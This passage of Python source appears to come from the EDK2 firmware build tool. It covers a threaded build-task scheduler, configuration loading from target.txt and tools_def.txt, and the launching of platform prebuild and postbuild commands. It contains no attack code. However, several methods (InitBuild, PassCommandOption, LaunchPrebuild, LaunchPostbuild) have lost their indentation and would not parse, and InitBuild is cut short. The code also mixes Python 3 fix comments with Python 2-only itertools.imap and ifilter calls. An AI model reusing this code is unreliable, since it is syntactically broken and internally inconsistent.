    _RunningQueueLock = threading.Lock()

    # queue containing all build tasks, in case duplicate build
    _TaskQueue = OrderedDict()

    # flag indicating error occurs in a running thread
    _ErrorFlag = threading.Event()
    _ErrorFlag.clear()
    _ErrorMessage = ""

    # BoundedSemaphore object used to control the number of running threads
    _Thread = None

    # flag indicating if the scheduler is started or not
    _SchedulerStopped = threading.Event()
    _SchedulerStopped.set()

    ## Start the task scheduler thread
    #
    #   @param  MaxThreadNumber     The maximum thread number
    #   @param  ExitFlag            Flag used to end the scheduler
    #
    @staticmethod
    def StartScheduler(MaxThreadNumber, ExitFlag):
        SchedulerThread = Thread(target=BuildTask.Scheduler, args=(MaxThreadNumber, ExitFlag))
        SchedulerThread.setName("Build-Task-Scheduler")
        SchedulerThread.setDaemon(False)
        SchedulerThread.start()
        # wait for the scheduler to be started, especially useful in Linux
        while not BuildTask.IsOnGoing():
            time.sleep(0.01)

    ## Scheduler method
    #
    #   @param  MaxThreadNumber     The maximum thread number
    #   @param  ExitFlag            Flag used to end the scheduler
    #
    @staticmethod
    def Scheduler(MaxThreadNumber, ExitFlag):
        BuildTask._SchedulerStopped.clear()
        try:
            # use BoundedSemaphore to control the maximum running threads
            BuildTask._Thread = BoundedSemaphore(MaxThreadNumber)
            #
            # scheduling loop, which will exits when no pending/ready task and
            # indicated to do so, or there's error in running thread
            #
            while (len(BuildTask._PendingQueue) > 0 or len(BuildTask._ReadyQueue) > 0 \
                   or not ExitFlag.isSet()) and not BuildTask._ErrorFlag.isSet():
                EdkLogger.debug(EdkLogger.DEBUG_8, "Pending Queue (%d), Ready Queue (%d)"
                                % (len(BuildTask._PendingQueue), len(BuildTask._ReadyQueue)))

                # get all pending tasks
                BuildTask._PendingQueueLock.acquire()
                # Snapshot the keys into a list: entries are popped from
                # _PendingQueue inside the loop below, and mutating a dict
                # while iterating its live key view raises RuntimeError on
                # Python 3.
                BuildObjectList = list(BuildTask._PendingQueue.keys())
                #
                # check if their dependency is resolved, and if true, move them
                # into ready queue
                #
                for BuildObject in BuildObjectList:
                    Bt = BuildTask._PendingQueue[BuildObject]
                    if Bt.IsReady():
                        BuildTask._ReadyQueue[BuildObject] = BuildTask._PendingQueue.pop(BuildObject)
                BuildTask._PendingQueueLock.release()

                # launch build thread until the maximum number of threads is reached
                while not BuildTask._ErrorFlag.isSet():
                    # empty ready queue, do nothing further
                    if len(BuildTask._ReadyQueue) == 0:
                        break

                    # wait for active thread(s) exit
                    BuildTask._Thread.acquire(True)

                    # start a new build thread
                    Bo, Bt = BuildTask._ReadyQueue.popitem()

                    # move into running queue
                    BuildTask._RunningQueueLock.acquire()
                    BuildTask._RunningQueue[Bo] = Bt
                    BuildTask._RunningQueueLock.release()

                    Bt.Start()
                    # avoid tense loop
                    time.sleep(0.01)

                # avoid tense loop
                time.sleep(0.01)

            # wait for all running threads exit
            if BuildTask._ErrorFlag.isSet():
                EdkLogger.quiet("\nWaiting for all build threads exit...")
            # while not BuildTask._ErrorFlag.isSet() and \
            while len(BuildTask._RunningQueue) > 0:
                EdkLogger.verbose("Waiting for thread ending...(%d)" % len(BuildTask._RunningQueue))
                EdkLogger.debug(EdkLogger.DEBUG_8, "Threads [%s]" % ", ".join(Th.getName() for Th in threading.enumerate()))
                # avoid tense loop
                time.sleep(0.1)
        except BaseException as X:
            #
            # TRICK: hide the output of threads left runing, so that the user can
            # catch the error message easily
            #
            EdkLogger.SetLevel(EdkLogger.ERROR)
            BuildTask._ErrorFlag.set()
            BuildTask._ErrorMessage = "build thread scheduler error\n\t%s" % str(X)

        BuildTask._PendingQueue.clear()
        BuildTask._ReadyQueue.clear()
        BuildTask._RunningQueue.clear()
        BuildTask._TaskQueue.clear()
        BuildTask._SchedulerStopped.set()

    ## Wait for all running method exit
    #
    @staticmethod
    def WaitForComplete():
        BuildTask._SchedulerStopped.wait()

    ## Check if the scheduler is running or not
    #
    @staticmethod
    def IsOnGoing():
        return not BuildTask._SchedulerStopped.isSet()

    ## Abort the build
    @staticmethod
    def Abort():
        if BuildTask.IsOnGoing():
            BuildTask._ErrorFlag.set()
            BuildTask.WaitForComplete()

    ## Check if there's error in running thread
    #
    #   Since the main thread cannot catch exceptions in other thread, we have to
    #   use threading.Event to communicate this formation to main thread.
    #
    @staticmethod
    def HasError():
        return BuildTask._ErrorFlag.isSet()

    ## Get error message in running thread
    #
    #   Since the main thread cannot catch exceptions in other thread, we have to
    #   use a static variable to communicate this message to main thread.
    #
    @staticmethod
    def GetErrorMessage():
        return BuildTask._ErrorMessage

    ## Factory method to create a BuildTask object
    #
    #   This method will check if a module is building or has been built. And if
    #   true, just return the associated BuildTask object in the _TaskQueue. If
    #   not, create and return a new BuildTask object. The new BuildTask object
    #   will be appended to the _PendingQueue for scheduling later.
    #
    #   @param  BuildItem       A BuildUnit object representing a build object
    #   @param  Dependency      The dependent build object of BuildItem
    #
    @staticmethod
    def New(BuildItem, Dependency=None):
        if BuildItem in BuildTask._TaskQueue:
            Bt = BuildTask._TaskQueue[BuildItem]
            return Bt

        Bt = BuildTask()
        Bt._Init(BuildItem, Dependency)
        BuildTask._TaskQueue[BuildItem] = Bt

        BuildTask._PendingQueueLock.acquire()
        BuildTask._PendingQueue[BuildItem] = Bt
        BuildTask._PendingQueueLock.release()

        return Bt

    ## The real constructor of BuildTask
    #
    #   @param  BuildItem       A BuildUnit object representing a build object
    #   @param  Dependency      The dependent build object of BuildItem
    #
    def _Init(self, BuildItem, Dependency=None):
        self.BuildItem = BuildItem

        self.DependencyList = []
        if Dependency is None:
            Dependency = BuildItem.Dependency
        else:
            Dependency.extend(BuildItem.Dependency)
        self.AddDependency(Dependency)
        # flag indicating build completes, used to avoid unnecessary re-build
        self.CompleteFlag = False

    ## Check if all dependent build tasks are completed or not
    #
    def IsReady(self):
        # ready when every dependency has finished building
        return all(Dep.CompleteFlag for Dep in self.DependencyList)

    ## Add dependent build task
    #
    #   @param  Dependency      The list of dependent build objects
    #
    def AddDependency(self, Dependency):
        for Dep in Dependency:
            if not Dep.BuildObject.IsBinaryModule:
                self.DependencyList.append(BuildTask.New(Dep))    # BuildTask list

    ## The thread wrapper of LaunchCommand function
    #
    # @param  Command               A list or string contains the call of the command
    # @param  WorkingDir            The directory in which the program will be running
    #
    def _CommandThread(self, Command, WorkingDir):
        try:
            self.BuildItem.BuildObject.BuildTime = LaunchCommand(Command, WorkingDir)
            self.CompleteFlag = True
        except:
            #
            # TRICK: hide the output of threads left runing, so that the user can
            #        catch the error message easily
            #
            if not BuildTask._ErrorFlag.isSet():
                GlobalData.gBuildingModule = "%s [%s, %s, %s]" % (str(self.BuildItem.BuildObject),
                                                                  self.BuildItem.BuildObject.Arch,
                                                                  self.BuildItem.BuildObject.ToolChain,
                                                                  self.BuildItem.BuildObject.BuildTarget
                                                                 )
            EdkLogger.SetLevel(EdkLogger.ERROR)
            BuildTask._ErrorFlag.set()
            BuildTask._ErrorMessage = "%s broken\n %s [%s]" % \
                                      (threading.currentThread().getName(), Command, WorkingDir)
        # indicate there's a thread is available for another build task
        BuildTask._RunningQueueLock.acquire()
        BuildTask._RunningQueue.pop(self.BuildItem)
        BuildTask._RunningQueueLock.release()
        BuildTask._Thread.release()

    ## Start build task thread
    #
    def Start(self):
        EdkLogger.quiet("Building ... %s" % repr(self.BuildItem))
        Command = self.BuildItem.BuildCommand + [self.BuildItem.Target]
        self.BuildTread = Thread(target=self._CommandThread, args=(Command, self.BuildItem.WorkingDir))
        self.BuildTread.setName("build thread")
        self.BuildTread.setDaemon(False)
        self.BuildTread.start()
## The class contains the information related to EFI image
#
class PeImageInfo():
    ## Constructor
    #
    # Constructor will load all required image information.
    #
    #   @param  BaseName          The full file path of image.
    #   @param  Guid              The GUID for image.
    #   @param  Arch              Arch of this image.
    #   @param  OutputDir         The output directory for image.
    #   @param  DebugDir          The debug directory for image.
    #   @param  ImageClass        PeImage Information
    #
    def __init__(self, BaseName, Guid, Arch, OutputDir, DebugDir, ImageClass):
        self.BaseName = BaseName
        self.Guid = Guid
        self.Arch = Arch
        self.OutputDir = OutputDir
        self.DebugDir = DebugDir
        self.Image = ImageClass
        # Round the image size up to the next 4 KB (0x1000) page boundary.
        # Floor division ("//") keeps Size an int on Python 3; plain "/"
        # produced a float and corrupted later address arithmetic.
        self.Image.Size = (self.Image.Size // 0x1000 + 1) * 0x1000
## The class implementing the EDK2 build process
#
# The build process includes:
# 1. Load configuration from target.txt and tools_def.txt in $(WORKSPACE)/Conf
# 2. Parse DSC file of active platform
# 3. Parse FDF file if any
# 4. Establish build database, including parse all other files (module, package)
# 5. Create AutoGen files (C code file, depex file, makefile) if necessary
# 6. Call build command
#
class Build():
## Constructor
#
# Constructor will load all necessary configurations, parse platform, modules
# and packages and the establish a database for AutoGen.
#
# @param Target The build command target, one of gSupportedTarget
# @param WorkspaceDir The directory of workspace
# @param BuildOptions Build options passed from command line
#
    def __init__(self, Target, WorkspaceDir, BuildOptions):
        """Load configuration, record command-line options, set up caches and
        the workspace database, and run the platform PREBUILD step if one is
        defined.

        Target       -- the build command target, one of gSupportedTarget
        WorkspaceDir -- the directory of the workspace
        BuildOptions -- parsed command-line options object
        """
        self.WorkspaceDir = WorkspaceDir
        self.Target = Target
        self.PlatformFile = BuildOptions.PlatformFile
        self.ModuleFile = BuildOptions.ModuleFile
        self.ArchList = BuildOptions.TargetArch
        self.ToolChainList = BuildOptions.ToolChain
        self.BuildTargetList= BuildOptions.BuildTarget
        self.Fdf = BuildOptions.FdfFile
        self.FdList = BuildOptions.RomImage
        self.FvList = BuildOptions.FvImage
        self.CapList = BuildOptions.CapName
        self.SilentMode = BuildOptions.SilentMode
        self.ThreadNumber = BuildOptions.ThreadNumber
        self.SkipAutoGen = BuildOptions.SkipAutoGen
        self.Reparse = BuildOptions.Reparse
        self.SkuId = BuildOptions.SkuId
        if self.SkuId:
            GlobalData.gSKUID_CMD = self.SkuId
        self.ConfDirectory = BuildOptions.ConfDirectory
        self.SpawnMode = True
        self.BuildReport = BuildReport(BuildOptions.ReportFile, BuildOptions.ReportType)
        self.TargetTxt = TargetTxtClassObject()
        self.ToolDef = ToolDefClassObject()
        # timing accumulators, reported at the end of the build
        self.AutoGenTime = 0
        self.MakeTime = 0
        self.GenFdsTime = 0
        GlobalData.BuildOptionPcd = BuildOptions.OptionPcd if BuildOptions.OptionPcd else []
        #Set global flag for build mode
        GlobalData.gIgnoreSource = BuildOptions.IgnoreSources
        GlobalData.gUseHashCache = BuildOptions.UseHashCache
        GlobalData.gBinCacheDest = BuildOptions.BinCacheDest
        GlobalData.gBinCacheSource = BuildOptions.BinCacheSource
        GlobalData.gEnableGenfdsMultiThread = BuildOptions.GenfdsMultiThread
        # validate mutually dependent/exclusive binary-cache options before use
        if GlobalData.gBinCacheDest and not GlobalData.gUseHashCache:
            EdkLogger.error("build", OPTION_NOT_SUPPORTED, ExtraData="--binary-destination must be used together with --hash.")
        if GlobalData.gBinCacheSource and not GlobalData.gUseHashCache:
            EdkLogger.error("build", OPTION_NOT_SUPPORTED, ExtraData="--binary-source must be used together with --hash.")
        if GlobalData.gBinCacheDest and GlobalData.gBinCacheSource:
            EdkLogger.error("build", OPTION_NOT_SUPPORTED, ExtraData="--binary-destination can not be used together with --binary-source.")
        # normalize cache paths; relative paths are resolved against the workspace
        if GlobalData.gBinCacheSource:
            BinCacheSource = os.path.normpath(GlobalData.gBinCacheSource)
            if not os.path.isabs(BinCacheSource):
                BinCacheSource = mws.join(self.WorkspaceDir, BinCacheSource)
            GlobalData.gBinCacheSource = BinCacheSource
        else:
            # non-None falsy value (e.g. empty string) is an invalid option value
            if GlobalData.gBinCacheSource is not None:
                EdkLogger.error("build", OPTION_VALUE_INVALID, ExtraData="Invalid value of option --binary-source.")
        if GlobalData.gBinCacheDest:
            BinCacheDest = os.path.normpath(GlobalData.gBinCacheDest)
            if not os.path.isabs(BinCacheDest):
                BinCacheDest = mws.join(self.WorkspaceDir, BinCacheDest)
            GlobalData.gBinCacheDest = BinCacheDest
        else:
            if GlobalData.gBinCacheDest is not None:
                EdkLogger.error("build", OPTION_VALUE_INVALID, ExtraData="Invalid value of option --binary-destination.")
        # resolve the Conf directory: --conf option > CONF_PATH env > WORKSPACE/Conf
        if self.ConfDirectory:
            # Get alternate Conf location, if it is absolute, then just use the absolute directory name
            ConfDirectoryPath = os.path.normpath(self.ConfDirectory)
            if not os.path.isabs(ConfDirectoryPath):
                # Since alternate directory name is not absolute, the alternate directory is located within the WORKSPACE
                # This also handles someone specifying the Conf directory in the workspace. Using --conf=Conf
                ConfDirectoryPath = mws.join(self.WorkspaceDir, ConfDirectoryPath)
        else:
            if "CONF_PATH" in os.environ:
                ConfDirectoryPath = os.path.normcase(os.path.normpath(os.environ["CONF_PATH"]))
            else:
                # Get standard WORKSPACE/Conf use the absolute path to the WORKSPACE/Conf
                ConfDirectoryPath = mws.join(self.WorkspaceDir, 'Conf')
        GlobalData.gConfDirectory = ConfDirectoryPath
        GlobalData.gDatabasePath = os.path.normpath(os.path.join(ConfDirectoryPath, GlobalData.gDatabasePath))
        # --disable-cache keeps the metafile database in memory only
        if BuildOptions.DisableCache:
            self.Db = WorkspaceDatabase(":memory:")
        else:
            self.Db = WorkspaceDatabase(GlobalData.gDatabasePath, self.Reparse)
        self.BuildDatabase = self.Db.BuildObject
        self.Platform = None
        self.ToolChainFamily = None
        self.LoadFixAddress = 0
        self.UniFlag = BuildOptions.Flag
        self.BuildModules = []
        self.HashSkipModules = []
        self.Db_Flag = False
        self.LaunchPrebuildFlag = False
        # marker file written by the PREBUILD script; its presence lets us skip InitBuild
        self.PlatformBuildPath = os.path.join(GlobalData.gConfDirectory, '.cache', '.PlatformBuild')
        if BuildOptions.CommandLength:
            GlobalData.gCommandMaxLength = BuildOptions.CommandLength
        # print dot character during doing some time-consuming work
        self.Progress = Utils.Progressor()
        # print current build environment and configuration
        EdkLogger.quiet("%-16s = %s" % ("WORKSPACE", os.environ["WORKSPACE"]))
        if "PACKAGES_PATH" in os.environ:
            # WORKSPACE env has been converted before. Print the same path style with WORKSPACE env.
            EdkLogger.quiet("%-16s = %s" % ("PACKAGES_PATH", os.path.normcase(os.path.normpath(os.environ["PACKAGES_PATH"]))))
        # NOTE(review): ECP_SOURCE/EDK_SOURCE/EFI_SOURCE are read unconditionally;
        # a KeyError here means the environment was not prepared by edksetup — confirm.
        EdkLogger.quiet("%-16s = %s" % ("ECP_SOURCE", os.environ["ECP_SOURCE"]))
        EdkLogger.quiet("%-16s = %s" % ("EDK_SOURCE", os.environ["EDK_SOURCE"]))
        EdkLogger.quiet("%-16s = %s" % ("EFI_SOURCE", os.environ["EFI_SOURCE"]))
        EdkLogger.quiet("%-16s = %s" % ("EDK_TOOLS_PATH", os.environ["EDK_TOOLS_PATH"]))
        if "EDK_TOOLS_BIN" in os.environ:
            # Print the same path style with WORKSPACE env.
            EdkLogger.quiet("%-16s = %s" % ("EDK_TOOLS_BIN", os.path.normcase(os.path.normpath(os.environ["EDK_TOOLS_BIN"]))))
        EdkLogger.quiet("%-16s = %s" % ("CONF_PATH", GlobalData.gConfDirectory))
        self.InitPreBuild()
        self.InitPostBuild()
        if self.Prebuild:
            EdkLogger.quiet("%-16s = %s" % ("PREBUILD", self.Prebuild))
        if self.Postbuild:
            EdkLogger.quiet("%-16s = %s" % ("POSTBUILD", self.Postbuild))
        if self.Prebuild:
            self.LaunchPrebuild()
            # re-create after prebuild: the prebuild script may have rewritten the Conf files
            self.TargetTxt = TargetTxtClassObject()
            self.ToolDef = ToolDefClassObject()
        if not (self.LaunchPrebuildFlag and os.path.exists(self.PlatformBuildPath)):
            self.InitBuild()
        EdkLogger.info("")
        os.chdir(self.WorkspaceDir)
## Load configuration
#
# This method will parse target.txt and get the build configurations.
#
    def LoadConfiguration(self):
        """Parse target.txt and tools_def.txt and derive the final build
        configuration: arch list, build targets, tool chains (with family),
        thread count and active platform. Command-line values take precedence
        over target.txt values.
        """
        #
        # Check target.txt and tools_def.txt and Init them
        #
        BuildConfigurationFile = os.path.normpath(os.path.join(GlobalData.gConfDirectory, gBuildConfiguration))
        if os.path.isfile(BuildConfigurationFile) == True:
            StatusCode = self.TargetTxt.LoadTargetTxtFile(BuildConfigurationFile)
            ToolDefinitionFile = self.TargetTxt.TargetTxtDictionary[DataType.TAB_TAT_DEFINES_TOOL_CHAIN_CONF]
            if ToolDefinitionFile == '':
                # fall back to the default tools_def.txt under WORKSPACE/Conf
                ToolDefinitionFile = gToolsDefinition
                ToolDefinitionFile = os.path.normpath(mws.join(self.WorkspaceDir, 'Conf', ToolDefinitionFile))
            if os.path.isfile(ToolDefinitionFile) == True:
                StatusCode = self.ToolDef.LoadToolDefFile(ToolDefinitionFile)
            else:
                EdkLogger.error("build", FILE_NOT_FOUND, ExtraData=ToolDefinitionFile)
        else:
            EdkLogger.error("build", FILE_NOT_FOUND, ExtraData=BuildConfigurationFile)
        # if no ARCH given in command line, get it from target.txt
        if not self.ArchList:
            self.ArchList = self.TargetTxt.TargetTxtDictionary[DataType.TAB_TAT_DEFINES_TARGET_ARCH]
        self.ArchList = tuple(self.ArchList)
        # if no build target given in command line, get it from target.txt
        if not self.BuildTargetList:
            self.BuildTargetList = self.TargetTxt.TargetTxtDictionary[DataType.TAB_TAT_DEFINES_TARGET]
        # if no tool chain given in command line, get it from target.txt
        if not self.ToolChainList:
            self.ToolChainList = self.TargetTxt.TargetTxtDictionary[DataType.TAB_TAT_DEFINES_TOOL_CHAIN_TAG]
            if self.ToolChainList is None or len(self.ToolChainList) == 0:
                EdkLogger.error("build", RESOURCE_NOT_AVAILABLE, ExtraData="No toolchain given. Don't know how to build.\n")
        # check if the tool chains are defined or not
        NewToolChainList = []
        for ToolChain in self.ToolChainList:
            if ToolChain not in self.ToolDef.ToolsDefTxtDatabase[TAB_TOD_DEFINES_TOOL_CHAIN_TAG]:
                EdkLogger.warn("build", "Tool chain [%s] is not defined" % ToolChain)
            else:
                NewToolChainList.append(ToolChain)
        # if no tool chain available, break the build
        if len(NewToolChainList) == 0:
            EdkLogger.error("build", RESOURCE_NOT_AVAILABLE,
                            ExtraData="[%s] not defined. No toolchain available for build!\n" % ", ".join(self.ToolChainList))
        else:
            self.ToolChainList = NewToolChainList
        # derive one tool chain family per tool chain tag; default to MSFT when unspecified
        ToolChainFamily = []
        ToolDefinition = self.ToolDef.ToolsDefTxtDatabase
        for Tool in self.ToolChainList:
            if TAB_TOD_DEFINES_FAMILY not in ToolDefinition or Tool not in ToolDefinition[TAB_TOD_DEFINES_FAMILY] \
               or not ToolDefinition[TAB_TOD_DEFINES_FAMILY][Tool]:
                EdkLogger.warn("build", "No tool chain family found in configuration for %s. Default to MSFT." % Tool)
                ToolChainFamily.append("MSFT")
            else:
                ToolChainFamily.append(ToolDefinition[TAB_TOD_DEFINES_FAMILY][Tool])
        self.ToolChainFamily = ToolChainFamily
        # thread count: command line > target.txt > CPU count (0 means "auto")
        if self.ThreadNumber is None:
            self.ThreadNumber = self.TargetTxt.TargetTxtDictionary[DataType.TAB_TAT_DEFINES_MAX_CONCURRENT_THREAD_NUMBER]
            if self.ThreadNumber == '':
                self.ThreadNumber = 0
            else:
                self.ThreadNumber = int(self.ThreadNumber, 0)
        if self.ThreadNumber == 0:
            try:
                self.ThreadNumber = multiprocessing.cpu_count()
            except (ImportError, NotImplementedError):
                self.ThreadNumber = 1
        # active platform: command line > target.txt > single *.dsc in current directory
        if not self.PlatformFile:
            PlatformFile = self.TargetTxt.TargetTxtDictionary[DataType.TAB_TAT_DEFINES_ACTIVE_PLATFORM]
            if not PlatformFile:
                # Try to find one in current directory
                WorkingDirectory = os.getcwd()
                FileList = glob.glob(os.path.normpath(os.path.join(WorkingDirectory, '*.dsc')))
                FileNum = len(FileList)
                if FileNum >= 2:
                    EdkLogger.error("build", OPTION_MISSING,
                                    ExtraData="There are %d DSC files in %s. Use '-p' to specify one.\n" % (FileNum, WorkingDirectory))
                elif FileNum == 1:
                    PlatformFile = FileList[0]
                else:
                    EdkLogger.error("build", RESOURCE_NOT_AVAILABLE,
                                    ExtraData="No active platform specified in target.txt or command line! Nothing can be built.\n")
            self.PlatformFile = PathClass(NormFile(PlatformFile, self.WorkspaceDir), self.WorkspaceDir)
## Initialize build configuration
#
# This method will parse DSC file and merge the configurations from
# command line and target.txt, then get the final build configurations.
#
def InitBuild(self):
# parse target.txt, tools_def.txt, and platform file
self.LoadConfiguration()
# Allow case-insensitive for those from command line or configuration file
ErrorCode, ErrorInfo = self.PlatformFile.Validate(".dsc", False)
if ErrorCode != 0:
EdkLogger.error("build", ErrorCode, ExtraData=ErrorInfo)
# create metafile database
if not self.Db_Flag:
self.Db.InitDatabase()
    def InitPreBuild(self):
        """Determine the platform PREBUILD command.

        Loads configuration, publishes TARGET/ARCH/TOOLCHAIN globals, reads the
        PREBUILD value from the command line or the platform DSC, converts
        workspace-relative arguments to absolute paths, and appends the
        original build options so the prebuild script sees the same context.
        """
        self.LoadConfiguration()
        ErrorCode, ErrorInfo = self.PlatformFile.Validate(".dsc", False)
        if ErrorCode != 0:
            EdkLogger.error("build", ErrorCode, ExtraData=ErrorInfo)
        # expose the first of each option list as global defines for macro expansion
        if self.BuildTargetList:
            GlobalData.gGlobalDefines['TARGET'] = self.BuildTargetList[0]
        if self.ArchList:
            GlobalData.gGlobalDefines['ARCH'] = self.ArchList[0]
        if self.ToolChainList:
            GlobalData.gGlobalDefines['TOOLCHAIN'] = self.ToolChainList[0]
            GlobalData.gGlobalDefines['TOOL_CHAIN_TAG'] = self.ToolChainList[0]
        if self.ToolChainFamily:
            GlobalData.gGlobalDefines['FAMILY'] = self.ToolChainFamily[0]
        # command-line PREBUILD define wins over the DSC's Prebuild entry
        if 'PREBUILD' in GlobalData.gCommandLineDefines:
            self.Prebuild = GlobalData.gCommandLineDefines.get('PREBUILD')
        else:
            # need the database to read the Prebuild setting out of the platform DSC
            self.Db.InitDatabase()
            self.Db_Flag = True
            Platform = self.Db._MapPlatform(str(self.PlatformFile))
            self.Prebuild = str(Platform.Prebuild)
        if self.Prebuild:
            PrebuildList = []
            #
            # Evaluate all arguments and convert arguments that are WORKSPACE
            # relative paths to absolute paths.  Filter arguments that look like
            # flags or do not follow the file/dir naming rules to avoid false
            # positives on this conversion.
            #
            for Arg in self.Prebuild.split():
                #
                # Do not modify Arg if it looks like a flag or an absolute file path
                #
                if Arg.startswith('-') or os.path.isabs(Arg):
                    PrebuildList.append(Arg)
                    continue
                #
                # Do not modify Arg if it does not look like a Workspace relative
                # path that starts with a valid package directory name
                #
                if not Arg[0].isalpha() or os.path.dirname(Arg) == '':
                    PrebuildList.append(Arg)
                    continue
                #
                # If Arg looks like a WORKSPACE relative path, then convert to an
                # absolute path and check to see if the file exists.
                #
                Temp = mws.join(self.WorkspaceDir, Arg)
                if os.path.isfile(Temp):
                    Arg = Temp
                PrebuildList.append(Arg)
            self.Prebuild = ' '.join(PrebuildList)
            # forward the build options (-b/-a/-t/-p/--conf) to the prebuild command
            self.Prebuild += self.PassCommandOption(self.BuildTargetList, self.ArchList, self.ToolChainList, self.PlatformFile, self.Target)
    def InitPostBuild(self):
        """Determine the platform POSTBUILD command.

        Mirrors InitPreBuild: reads POSTBUILD from the command line or the
        platform DSC, converts workspace-relative arguments to absolute paths,
        and appends the original build options.
        """
        # command-line POSTBUILD define wins over the DSC's Postbuild entry
        if 'POSTBUILD' in GlobalData.gCommandLineDefines:
            self.Postbuild = GlobalData.gCommandLineDefines.get('POSTBUILD')
        else:
            Platform = self.Db._MapPlatform(str(self.PlatformFile))
            self.Postbuild = str(Platform.Postbuild)
        if self.Postbuild:
            PostbuildList = []
            #
            # Evaluate all arguments and convert arguments that are WORKSPACE
            # relative paths to absolute paths.  Filter arguments that look like
            # flags or do not follow the file/dir naming rules to avoid false
            # positives on this conversion.
            #
            for Arg in self.Postbuild.split():
                #
                # Do not modify Arg if it looks like a flag or an absolute file path
                #
                if Arg.startswith('-') or os.path.isabs(Arg):
                    PostbuildList.append(Arg)
                    continue
                #
                # Do not modify Arg if it does not look like a Workspace relative
                # path that starts with a valid package directory name
                #
                if not Arg[0].isalpha() or os.path.dirname(Arg) == '':
                    PostbuildList.append(Arg)
                    continue
                #
                # If Arg looks like a WORKSPACE relative path, then convert to an
                # absolute path and check to see if the file exists.
                #
                Temp = mws.join(self.WorkspaceDir, Arg)
                if os.path.isfile(Temp):
                    Arg = Temp
                PostbuildList.append(Arg)
            self.Postbuild = ' '.join(PostbuildList)
            # forward the build options (-b/-a/-t/-p/--conf) to the postbuild command
            self.Postbuild += self.PassCommandOption(self.BuildTargetList, self.ArchList, self.ToolChainList, self.PlatformFile, self.Target)
def PassCommandOption(self, BuildTarget, TargetArch, ToolChain, PlatformFile, Target):
BuildStr = ''
if GlobalData.gCommand and isinstance(GlobalData.gCommand, list):
BuildStr += ' ' + ' '.join(GlobalData.gCommand)
TargetFlag = False
ArchFlag = False
ToolChainFlag = False
PlatformFileFlag = False
if GlobalData.gOptions and not GlobalData.gOptions.BuildTarget:
TargetFlag = True
if GlobalData.gOptions and not GlobalData.gOptions.TargetArch:
ArchFlag = True
if GlobalData.gOptions and not GlobalData.gOptions.ToolChain:
ToolChainFlag = True
if GlobalData.gOptions and not GlobalData.gOptions.PlatformFile:
PlatformFileFlag = True
if TargetFlag and BuildTarget:
if isinstance(BuildTarget, list) or isinstance(BuildTarget, tuple):
BuildStr += ' -b ' + ' -b '.join(BuildTarget)
elif isinstance(BuildTarget, str):
BuildStr += ' -b ' + BuildTarget
if ArchFlag and TargetArch:
if isinstance(TargetArch, list) or isinstance(TargetArch, tuple):
BuildStr += ' -a ' + ' -a '.join(TargetArch)
elif isinstance(TargetArch, str):
BuildStr += ' -a ' + TargetArch
if ToolChainFlag and ToolChain:
if isinstance(ToolChain, list) or isinstance(ToolChain, tuple):
BuildStr += ' -t ' + ' -t '.join(ToolChain)
elif isinstance(ToolChain, str):
BuildStr += ' -t ' + ToolChain
if PlatformFileFlag and PlatformFile:
if isinstance(PlatformFile, list) or isinstance(PlatformFile, tuple):
BuildStr += ' -p ' + ' -p '.join(PlatformFile)
elif isinstance(PlatformFile, str):
BuildStr += ' -p' + PlatformFile
BuildStr += ' --conf=' + GlobalData.gConfDirectory
if Target:
BuildStr += ' ' + Target
return BuildStr
def LaunchPrebuild(self):
if self.Prebuild:
EdkLogger.info("\n- Prebuild Start -\n")
self.LaunchPrebuildFlag = True
#
# The purpose of .PrebuildEnv file is capture environment variable settings set by the prebuild script
# and preserve them for the rest of the main build step, because the child process environment will
# evaporate as soon as it exits, we cannot get it in build step.
#
PrebuildEnvFile = os.path.join(GlobalData.gConfDirectory, '.cache', '.PrebuildEnv')
if os.path.isfile(PrebuildEnvFile):
os.remove(PrebuildEnvFile)
if os.path.isfile(self.PlatformBuildPath):
os.remove(self.PlatformBuildPath)
if sys.platform == "win32":
args = ' && '.join((self.Prebuild, 'set > ' + PrebuildEnvFile))
Process = Popen(args, stdout=PIPE, stderr=PIPE, shell=True)
else:
args = ' && '.join((self.Prebuild, 'env > ' + PrebuildEnvFile))
Process = Popen(args, stdout=PIPE, stderr=PIPE, shell=True)
# launch two threads to read the STDOUT and STDERR
EndOfProcedure = Event()
EndOfProcedure.clear()
if Process.stdout:
StdOutThread = Thread(target=ReadMessage, args=(Process.stdout, EdkLogger.info, EndOfProcedure))
StdOutThread.setName("STDOUT-Redirector")
StdOutThread.setDaemon(False)
StdOutThread.start()
if Process.stderr:
StdErrThread = Thread(target=ReadMessage, args=(Process.stderr, EdkLogger.quiet, EndOfProcedure))
StdErrThread.setName("STDERR-Redirector")
StdErrThread.setDaemon(False)
StdErrThread.start()
# waiting for program exit
Process.wait()
if Process.stdout:
StdOutThread.join()
if Process.stderr:
StdErrThread.join()
if Process.returncode != 0 :
EdkLogger.error("Prebuild", PREBUILD_ERROR, 'Prebuild process is not success!')
if os.path.exists(PrebuildEnvFile):
f = open(PrebuildEnvFile)
envs = f.readlines()
f.close()
envs = itertools.imap(lambda l: l.split('=', 1), envs)
envs = itertools.ifilter(lambda l: len(l) == 2, envs)
envs = itertools.imap(lambda l: [i.strip() for i in l], envs)
os.environ.update(dict(envs))
EdkLogger.info("\n- Prebuild Done -\n")
def LaunchPostbuild(self):
if self.Postbuild:
EdkLogger.info("\n- Postbuild Start -\n")
if sys.platform == "win32":
Process = Popen(self.Postbuild, stdout=PIPE, stderr=PIPE, shell=True)
else:
Process = Popen(self.Postbuild, stdout=PIPE, stderr=PIPE, shell=True)
# launch two threads to read the STDOUT and STDERR
EndOfProcedure = Event()
EndOfProcedure.clear()
if Process.stdout:
StdOutThread = Thread(target=ReadMessage, args=(Process.stdout, EdkLogger.info, EndOfProcedure))
StdOutThread.setName("STDOUT-Redirector")
StdOutThread.setDaemon(False)
StdOutThread.start()
if Process.stderr:
StdErrThread = Thread(target=ReadMessage, args=(Process.stderr, EdkLogger.quiet, EndOfProcedure))
StdErrThread.setName("STDERR-Redirector")
StdErrThread.setDaemon(False)
StdErrThread.start()
# waiting for program exit
Process.wait()
if Process.stdout:
StdOutThread.join()
if Process.stderr:
StdErrThread.join()
if Process.returncode != 0 :
EdkLogger.error("Postbuild", POSTBUILD_ERROR, 'Postbuild process is not success!')
EdkLogger.info("\n- Postbuild Done -\n")
## Build a module or platform
#
# Create autogen code and makefile for a module or platform, and the launch
# "make" command to build it
#
# @param Target The target of build command
# @param Platform The platform file
# @param Module The module file
# @param BuildTarget The name of build target, one of "DEBUG", "RELEASE"
# @param ToolChain The name of toolchain to build
# @param Arch The arch of the module/platform
# @param CreateDepModuleCodeFile Flag used to indicate creating code
# for dependent modules/Libraries
